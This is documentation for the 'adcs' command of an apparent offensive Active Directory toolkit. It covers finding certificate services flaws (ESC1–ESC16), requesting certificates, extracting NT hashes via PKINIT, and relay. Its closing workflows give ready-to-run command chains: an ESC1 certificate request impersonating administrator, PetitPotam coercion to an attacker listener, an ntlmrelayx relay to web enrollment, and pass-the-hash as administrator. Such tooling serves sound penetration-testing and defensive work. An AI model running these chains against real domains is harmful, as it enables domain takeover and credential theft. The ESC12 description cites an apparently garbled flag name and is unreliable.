adcs

The adcs command provides tooling for enumerating, analyzing, and exploiting Active Directory Certificate Services (ADCS). It covers certificate authority enumeration, vulnerability detection across ESC1–ESC16, certificate requests, NT hash extraction via PKINIT, and relay attack enumeration.

Usage

r4t adcs <subcommand> [flags]

Subcommands

`adcs find`

Enumerate the full ADCS environment and detect vulnerabilities. This is typically the first ADCS command you run — it enumerates all certificate authorities and certificate templates, then evaluates them for known escalation scenarios (ESC1–ESC16).

r4t adcs find

# Specify LDAP server and output directory
r4t adcs find --ldap-server 10.10.10.10 --output ./adcs-results/

Flags

Flag	Description
`--output`, `-o`	Directory to write enumeration results
`--ldap-server`	LDAP server (defaults to stored target)

What It Detects

ESC	Description
ESC1	Template allows client-supplied Subject Alternative Names with enrollment rights to low-privileged users
ESC2	Template has the Any Purpose or SubCA EKU with enrollment rights to low-privileged users
ESC3	Template allows enrollment agent enrollment (Certificate Request Agent)
ESC4	Template has a vulnerable DACL that allows low-privileged users to modify the template
ESC5	Vulnerable PKI object DACL (CA, AIA, CDP, NTAuthCertificates)
ESC6	CA has EDITF_ATTRIBUTESUBJECTALTNAME2 flag set
ESC7	CA has dangerous permissions for unprivileged users
ESC8	CA web enrollment is accessible and allows NTLM relay
ESC9	Certificate template with no security extension and `CT_FLAG_NO_SECURITY_EXTENSION`
ESC10	Weak certificate mapping configuration on the target domain
ESC11	CA has IF_ENFORCEENCRYPTICERTREQUEST flag not set
ESC12	CA Shell access via EDITF_ATTRIBUTEALTNAME2
ESC13	Issuance policy linked to a group enables privilege escalation
ESC16	CA does not enforce strong certificate binding

Results are stored in the certificate_authorities, certificate_templates, and adcs_vulnerabilities tables.

`adcs req`

Request or retrieve certificates from a Certificate Authority.

# Request a certificate from a template
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com --template "User" \
  --upn administrator@corp.example.com --out /tmp/admin.pfx

# Retrieve a pending certificate by request ID
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com --retrieve --request-id 42

# ESC1 exploitation — supply an arbitrary SAN UPN
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com \
  --template "VulnerableTemplate" --upn administrator@corp.example.com \
  --out /tmp/admin.pfx

# Include DNS SAN
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com \
  --template "User" --dns "dc01.corp.example.com" --out /tmp/dc01.pfx

# Output as PEM instead of PFX
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com \
  --template "User" --out /tmp/user.pem --pem

Flags

Flag	Description
`--ca`	Certificate Authority name (required)
`--target`	Target CA server hostname/IP (required)
`--template`	Certificate template name
`--subject`	Certificate subject (e.g., `CN=user`)
`--upn`	User Principal Name for Subject Alternative Name
`--dns`	DNS SAN (repeatable, e.g., `--dns host1 --dns host2`)
`--email`	Email SAN
`--ip`	IP SAN (repeatable)
`--attributes`	Additional request attributes
`--key-size`	RSA key size in bits (default: 2048)
`--key-file`	Use an existing private key
`--method`	Request method: `rpc`, `dcom`, or `web` (default: `rpc`)
`--retrieve`	Retrieve a pending or already-issued certificate
`--request-id`	Request ID to retrieve
`--out`, `-o`	Output file path for the certificate
`--pem`	Output in PEM format instead of PFX
`--no-key`	Don’t include private key in output

`adcs nt`

Extract the NT hash of an account using PKINIT + UnPAC-the-Hash. When you have a valid certificate for an account (e.g., obtained via adcs req), you can authenticate via Kerberos PKINIT to get a TGT, then extract the NT hash from the PAC field. This allows lateral movement with Pass-the-Hash even when you only have a certificate.

# Using PFX certificate (loaded from stored credential or inline)
r4t adcs nt --pfx /tmp/admin.pfx

# Override UPN (when the certificate UPN differs from the target)
r4t adcs nt --pfx /tmp/admin.pfx --upn administrator@corp.example.com

Flags

Flag	Description
`--upn`	Override UPN for authentication

Authentication flags (--pfx, --pfx-password, --cert, --key, --ccache) are inherited from the global flags or stored credential.

`adcs relay`

Enumerate and support ADCS relay attacks (ESC8).

r4t adcs relay

ESC8 involves relaying NTLM authentication to the CA web enrollment endpoint (/certsrv/certfnsh.asp) to request a certificate on behalf of the coerced machine account. R4t’s relay subcommand provides enumeration support for identifying relay targets.

`adcs auth` (planned)

Authenticate using certificates (PKINIT or Schannel). Not yet fully implemented.

`adcs account` (planned)

Manage Active Directory accounts via ADCS. Not yet implemented.

`adcs ca` (planned)

Manage Certificate Authorities (view, configure). Not yet implemented.

`adcs cert` (planned)

Certificate format conversion utilities (PFX ↔ PEM, extract private key, etc.). Not yet implemented.

`adcs forge` (planned)

Forge certificates — Golden Certificate attacks using the stolen CA private key. Not yet implemented.

`adcs shadow` (planned)

Shadow Credentials — manipulate msDS-KeyCredentialLink on target objects for certificate-based authentication without a template. Not yet implemented as a standalone subcommand (shadow credential detection is available via ldap scan).

`adcs template` (planned)

Manage certificate templates (create, modify, delete). Not yet implemented.

`adcs parse` (planned)

Parse certificate templates from offline LDAP output files. Not yet implemented.

Common ADCS Attack Workflows

ESC1 — Client-Supplied SAN

# 1. Find vulnerable template
r4t adcs find

# 2. Request certificate with arbitrary UPN
r4t adcs req --ca "corp-CA" --target dc01.corp.example.com \
  --template "VulnerableTemplate" --upn administrator@corp.example.com \
  --out /tmp/admin.pfx

# 3. Extract NT hash via PKINIT
r4t adcs nt --pfx /tmp/admin.pfx

# 4. Or get a TGT directly
r4t krb tgt --pfx /tmp/admin.pfx

ESC8 — NTLM Relay to Web Enrollment

# 1. Identify ESC8 using adcs find
r4t adcs find

# 2. Coerce a machine account to authenticate
r4t coerce petitpotam --listener <attacker-ip> dc01.corp.example.com

# 3. Relay authentication to CA web enrollment (external relay tool)
# ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp --adcs --template "Machine"

# 4. Use resulting certificate
r4t adcs nt --pfx /tmp/dc01.pfx

NT Hash Extraction Chain

# Full chain: cert → PKINIT → NT hash → Pass-the-Hash
r4t adcs req --ca "corp-CA" --target dc01 --template "User" --upn admin@corp --out /tmp/admin.pfx
r4t adcs nt --pfx /tmp/admin.pfx
# Take the NT hash output and use it:
r4t creds add --username administrator --hash <extracted-hash> --domain corp.example.com
r4t creds set <id>
r4t ldap get users  # now authenticating as administrator

commands

​adcs

​Usage

​Subcommands

​adcs find

​Flags

​What It Detects

​adcs req

​Flags

​adcs nt

​Flags

​adcs relay

​adcs auth (planned)

​adcs account (planned)

​adcs ca (planned)

​adcs cert (planned)

​adcs forge (planned)

​adcs shadow (planned)

​adcs template (planned)

​adcs parse (planned)

​Common ADCS Attack Workflows

​ESC1 — Client-Supplied SAN

​ESC8 — NTLM Relay to Web Enrollment

​NT Hash Extraction Chain

adcs

Usage

Subcommands

`adcs find`

Flags

What It Detects

`adcs req`

Flags

`adcs nt`

Flags

`adcs relay`

`adcs auth` (planned)

`adcs account` (planned)

`adcs ca` (planned)

`adcs cert` (planned)

`adcs forge` (planned)

`adcs shadow` (planned)

`adcs template` (planned)

`adcs parse` (planned)

Common ADCS Attack Workflows

ESC1 — Client-Supplied SAN

ESC8 — NTLM Relay to Web Enrollment

NT Hash Extraction Chain